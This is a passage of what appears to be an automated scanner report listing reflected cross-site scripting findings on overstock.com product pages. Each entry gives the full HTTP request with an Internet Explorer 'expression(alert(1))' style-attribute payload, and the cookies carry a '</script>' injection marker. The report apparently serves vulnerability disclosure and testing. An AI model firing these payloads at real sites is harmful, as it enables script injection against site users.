GET /Home-Garden/Jennings-Natural-4-foot-Swing/4072702/product.html?3ce5f"style%3d"x%3aexpression(alert(1))"48147bdc289=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.266. http://www.overstock.com/Home-Garden/John-Louis-Standard-Red-Mahogany-Closet-System/2885248/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f3b9"style%3d"x%3aexpression(alert(1))"9151ec9c217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f3b9"style="x:expression(alert(1))"9151ec9c217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/John-Louis-Standard-Red-Mahogany-Closet-System/2885248/product.html?5f3b9"style%3d"x%3aexpression(alert(1))"9151ec9c217=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.267. http://www.overstock.com/Home-Garden/Kamenstein-16-jar-Click-Featured-Revolving-Spice-Rack/4371039/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e13"style%3d"x%3aexpression(alert(1))"f7943e90fa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a6e13"style="x:expression(alert(1))"f7943e90fa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Kamenstein-16-jar-Click-Featured-Revolving-Spice-Rack/4371039/product.html?a6e13"style%3d"x%3aexpression(alert(1))"f7943e90fa9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.268. http://www.overstock.com/Home-Garden/Kashmir-Multi-color-Shower-Curtain/4662698/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b526"style%3d"x%3aexpression(alert(1))"dc87e2369a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b526"style="x:expression(alert(1))"dc87e2369a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Kashmir-Multi-color-Shower-Curtain/4662698/product.html?9b526"style%3d"x%3aexpression(alert(1))"dc87e2369a2=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.269. http://www.overstock.com/Home-Garden/KitchenAid-KSM455PSSM-Silver-Metallic-Pro-450-Series-Stand-Mixer/5190409/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c44"style%3d"x%3aexpression(alert(1))"866d49ec72d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21c44"style="x:expression(alert(1))"866d49ec72d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/KitchenAid-KSM455PSSM-Silver-Metallic-Pro-450-Series-Stand-Mixer/5190409/product.html?21c44"style%3d"x%3aexpression(alert(1))"866d49ec72d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80def"style%3d"x%3aexpression(alert(1))"cf1f9539bb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80def"style="x:expression(alert(1))"cf1f9539bb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Knox-Espresso-Desk/3312226/product.html?80def"style%3d"x%3aexpression(alert(1))"cf1f9539bb8=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.271. http://www.overstock.com/Home-Garden/Koen-Glass-Sink-Wood-base-Pedestal-Vanity-Set/4066556/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c95c"style%3d"x%3aexpression(alert(1))"f7049fdcb47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c95c"style="x:expression(alert(1))"f7049fdcb47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Koen-Glass-Sink-Wood-base-Pedestal-Vanity-Set/4066556/product.html?1c95c"style%3d"x%3aexpression(alert(1))"f7049fdcb47=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.272. http://www.overstock.com/Home-Garden/LED-Light-and-18-volt-Cordless-Drill/4429830/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5485"style%3d"x%3aexpression(alert(1))"811532bd056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5485"style="x:expression(alert(1))"811532bd056 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/LED-Light-and-18-volt-Cordless-Drill/4429830/product.html?e5485"style%3d"x%3aexpression(alert(1))"811532bd056=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.273. http://www.overstock.com/Home-Garden/LG-14-inch-Tall-Universal-Fit-Washer-and-Dryer-Pedestal-Refurbished/4719277/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98857"style%3d"x%3aexpression(alert(1))"228bca09fd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98857"style="x:expression(alert(1))"228bca09fd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/LG-14-inch-Tall-Universal-Fit-Washer-and-Dryer-Pedestal-Refurbished/4719277/product.html?98857"style%3d"x%3aexpression(alert(1))"228bca09fd9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.274. http://www.overstock.com/Home-Garden/Large-Memory-Foam-Lounge-Bag/2873879/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5df1"style%3d"x%3aexpression(alert(1))"e55a432ee39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5df1"style="x:expression(alert(1))"e55a432ee39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Large-Memory-Foam-Lounge-Bag/2873879/product.html?b5df1"style%3d"x%3aexpression(alert(1))"e55a432ee39=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.275. http://www.overstock.com/Home-Garden/Large-Memory-Foam-Video-Game-Chair/2519084/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 638f7"style%3d"x%3aexpression(alert(1))"216f6ccc92c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 638f7"style="x:expression(alert(1))"216f6ccc92c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Large-Memory-Foam-Video-Game-Chair/2519084/product.html?638f7"style%3d"x%3aexpression(alert(1))"216f6ccc92c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.276. http://www.overstock.com/Home-Garden/Large-Quilted-Striped-Hammock/3665629/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92082"style%3d"x%3aexpression(alert(1))"364757e1294 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92082"style="x:expression(alert(1))"364757e1294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Large-Quilted-Striped-Hammock/3665629/product.html?92082"style%3d"x%3aexpression(alert(1))"364757e1294=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.277. http://www.overstock.com/Home-Garden/Lasko-Ceramic-Tower-Heater/3461361/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62f0"style%3d"x%3aexpression(alert(1))"4e69d2b1062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d62f0"style="x:expression(alert(1))"4e69d2b1062 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Lasko-Ceramic-Tower-Heater/3461361/product.html?d62f0"style%3d"x%3aexpression(alert(1))"4e69d2b1062=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.278. http://www.overstock.com/Home-Garden/Laura-Ashley-4-piece-Printed-Flannel-Sheet-Set/4458640/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5012"style%3d"x%3aexpression(alert(1))"2d078acef72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5012"style="x:expression(alert(1))"2d078acef72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Laura-Ashley-4-piece-Printed-Flannel-Sheet-Set/4458640/product.html?a5012"style%3d"x%3aexpression(alert(1))"2d078acef72=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.279. http://www.overstock.com/Home-Garden/Laura-Ashley-600-gram-6-piece-Towel-Set/4692862/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c35"style%3d"x%3aexpression(alert(1))"241b647ee02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46c35"style="x:expression(alert(1))"241b647ee02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
